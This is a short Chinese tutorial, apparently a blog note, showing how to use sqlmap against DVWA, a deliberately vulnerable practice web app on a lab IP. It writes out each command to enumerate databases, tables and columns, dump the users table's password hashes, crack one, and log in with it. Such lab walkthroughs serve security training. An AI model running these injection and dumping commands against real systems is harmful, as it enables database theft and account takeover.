工具使用 | sqlmap的简单使用–以DVWA为靶场
- 2019 年 10 月 7 日
- 筆記
0x00 找到注入点
http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#

0x01 利用sqlmap进行注入
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low"

期间会遇到一些询问,可以自己判断是还是否,也可以一路回车,最后将会显示出靶机的一些相关信息,比如数据库版本、系统类型等

利用—dbs参数获取数据库信息
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low" --dbs

利用-D指定数据库,—tables查看该数据库下所有表
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low" -D dvwa --tables

利用-T指定表,—colums查看该表下所有列
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low" -D dvwa -T users --columns

最后利用-C指定列,—dump进行脱裤
Sqlmap -u "http://192.168.1.110/dvwa/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie="PHPSESSID=468f00d6d60706396d1de4f7aea6ff27;security=low" -D dvwa -T users -C user,password --dump

对密码的MD5值进行解密,这里以pablo用户的密码MD5值为例

0x02 利用爆出的用户名密码登陆系统
利用Sqlmap爆出的用户pablo,密码letmein进行登陆

成功登陆,关于sqlmap的用法还有很多,这里只介绍了最为常见的一种。